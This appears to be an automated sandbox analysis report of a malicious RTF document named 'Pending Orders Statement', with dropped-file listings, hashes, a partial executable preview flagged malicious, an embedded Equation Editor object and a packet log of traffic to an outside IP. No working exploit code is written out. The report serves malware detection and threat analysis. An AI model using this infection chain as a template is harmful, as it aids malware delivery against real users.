File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:29:36 2021, length=354788, window=hide
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	4.5918339824333545
Encrypted:	false
SSDEEP:	24:8rD/XTd6jFyi2ekAsqDDv3qPdM7dD2rD/XTd6jFyi2ekAsqDDv3qPdM7dV:8f/XT0jFt26qPQh2f/XT0jFt26qPQ/
MD5:	016FB75FF443766A7279CA9045AF5BDD
SHA1:	FD32D47D894E3105C74A04367F2D5EE8A91A87AC
SHA-256:	1B919601559C7502D75FC4364275964239103DBFCBA815CAA84974E8ACAF9053
SHA-512:	941629FE30E9CD0EA5B302BA6C6BF3281E1BF0D7C90638F97BA5378F34DDD57A6B49AE40093D62C6A6F6CD97347E2F55E7AFC0B25F0A1E38FEA3CB69B7E565D4
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...y.j..{..y.j..{...;..%....i...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..i..<R.. .PENDIN~1.DOC..z.......Q.y.Q.y...8.....................P.e.n.d.i.n.g. .O.r.d.e.r.s. .S.t.a.t.e.m.e.n.t. .-.4.0.0.6.4.7.7.8...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\724536\Users.user\Desktop\Pending Orders Statement -40064778.doc.=.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.n.d.i.n.g. .O.r.d.e.r.s. .S.t.a.t.e.m.e.n.t. .-.4.0.0.6.4.7.7.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	140
Entropy (8bit):	4.736685473680344
Encrypted:	false
SSDEEP:	3:M1K++i2RyDhdpStb+i2RyDhdpSmX1K++i2RyDhdpSv:MIdi2RULpECi2RULpAdi2RULpc
MD5:	821573196FFE2311197C79E1D2FD939E
SHA1:	39CCA7E16FE3E84413C236FCDE8349E681A4CD4C
SHA-256:	EC23706907FB744BCA81DA26E10E724D5E06A4B6009F0C431110F8045EC44FB5
SHA-512:	A0BD9FC15A76FCE0AD4FA6C53661B432F8F90A200F80276A64803FD83E02582B22EC5744210B036F0E9018B24411DCFE6FD5CA02877463E3E5497F44CBBE163C
Malicious:	false
Reputation:	low
Preview:	[doc]..Pending Orders Statement -40064778.LNK=0..Pending Orders Statement -40064778.LNK=0..[doc]..Pending Orders Statement -40064778.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	246784
Entropy (8bit):	5.925208163230513
Encrypted:	false
SSDEEP:	3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
MD5:	D0154FB70ABD786136AE9F68F285541C
SHA1:	42988286A1993959373A692AC455375B6AD2AE76
SHA-256:	E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
SHA-512:	8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..`................................. ........@.. ....................... ............`.....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..............................P ........................................................................................................................................................................r\..p(N........s.........r`..p.....sO.........r..p......%.r..p.%.r...p.%.r..p.(<....r..p......%.r..p.%.r...p.%.r...p.%.r..p.(<....r..p......%.r=f.p.%.r...p.%.r=f.p.%.r.g.p.(<...~~....:....(0...sg........~..... ....2rx..p.()...2r...p.().........(....~~....:....(

C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, version 1, unknown character set
Entropy (8bit):	4.005010844024142
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Pending Orders Statement -40064778.doc
File size:	354788
MD5:	47c45cbbc8fa7c9c62efdfcadee09e99
SHA1:	e44f1f16be00551108ece175186d84ce6432a177
SHA256:	1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
SHA512:	f85529aa06ed4c492e2ab067df3519bcec86288f9f32112802785169b219bba6c36dc371516f045acbd1c9e2ea0b2099992a67d2978cb962ed14a85a9821734e
SSDEEP:	6144:iaVgbuklQVZRG1DPV9Uq+qUF9pa3C4T/JnsKxW7Cn11Y6xbZ3Icf12CLPvqSuoo:zSbT6ZyrVyq+X7l49nC7+Brc6XEH
File Content Preview:	{\rtf1854{\object14683912 14683912\objhtml\objw9136\objh7915{\*\objdata675050 {\mchr4061916.4061916\.4061916 \mchr4061916.4061916\.4061916} \..................... .fbe51715020000000b000

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000053h	2	embedded	eqUATION.3	177225				no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:29:35.986691952 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.072520018 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.072607040 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.072925091 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.160597086 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354144096 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354203939 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354243994 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354281902 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354320049 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354357004 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354404926 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354439974 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.354448080 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354474068 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.354480028 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.354484081 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.354485989 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354502916 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.354525089 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.354547024 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.354590893 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.363082886 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.440202951 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.440604925 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.447611094 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.447655916 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.447866917 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.447912931 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.452287912 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.452330112 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.452481985 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.452526093 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.456533909 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.456576109 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.456648111 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.456675053 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.461241007 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.461283922 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.461391926 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.461437941 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.465612888 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.465711117 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.465711117 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.465765953 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.470371962 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.470412016 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.470509052 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.470555067 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.474622965 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.474699974 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.474782944 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.474827051 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.479243994 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.479285955 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.479336023 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.479367018 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.483680010 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.483758926 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.483855963 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.483903885 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.488166094 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.488248110 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.526103973 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.526386976 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.528136969 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.528300047 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.533133984 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.533291101 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.535181999 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.535224915 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.535330057 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.535372972 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.539221048 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.539259911 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.539367914 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.539412022 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.542968988 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.543013096 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.543064117 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.543107986 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.546428919 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.546467066 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.546513081 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.546555042 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.549827099 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.549868107 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.549935102 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.549977064 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.552992105 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.553034067 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.553076029 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.553117990 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.555919886 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.555964947 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.556045055 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.556087971 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.558938026 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.559011936 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.559020042 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.559058905 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.561638117 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.561680079 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.561708927 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.561734915 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.564626932 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.564667940 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.564757109 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.564800024 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.567045927 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.567085028 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.567186117 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.567205906 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.569545984 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.569586992 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.569641113 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.571043015 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.572016954 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.572057009 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.572104931 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.572129011 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.574443102 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.574481964 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.574508905 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.574534893 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.577076912 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.577117920 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.577199936 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.577244997 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.579154968 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.579193115 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.579237938 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.579263926 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.581456900 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.581505060 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.581533909 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.581543922 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.581572056 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.581587076 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.583790064 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.583830118 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.583928108 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.583971977 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.611849070 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.611886978 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.612109900 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.612174034 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.613641977 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.613682985 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.613728046 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.613754034 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.619950056 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.619998932 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.620131969 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.620712996 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.620753050 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.620794058 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.620807886 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.623863935 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.623903990 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.623965025 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.623991013 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.624572992 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.624605894 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.624650002 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.624669075 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.627692938 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.627753019 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.627815962 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.627841949 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.628377914 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.628420115 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.628460884 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.628487110 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.629748106 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.629817963 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.631900072 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.631969929 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.632859945 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.632926941 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.635416031 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.635510921 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.636224031 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.636288881 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.638458014 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.638537884 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.639182091 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.639250040 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.641233921 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.641304016 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.642153025 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.642211914 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.644289017 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.644366980 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.644967079 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.645039082 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.646888018 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.646984100 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.647744894 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.647818089 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.649904966 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.649996996 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.650588036 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.650657892 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.652380943 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.652468920 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.653119087 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.653188944 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.654795885 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.654866934 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.656236887 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.656305075 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.657226086 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.657295942 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.657916069 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.657989979 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.659600019 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.659674883 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.660307884 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.660375118 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.662404060 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.662513971 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.663117886 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.663193941 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.664326906 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.664429903 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.664994001 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.665047884 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.666790962 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.666960955 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.667222023 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.667313099 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.667335987 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.667417049 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.669188976 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.669214964 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.669337988 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.697422981 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.697451115 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.697604895 CET	49167	80	192.168.2.22	172.111.202.41
Jan 27, 2021 19:29:36.699017048 CET	80	49167	172.111.202.41	192.168.2.22
Jan 27, 2021 19:29:36.699039936 CET	80	49167	172.111.202.41	192.168.2.22
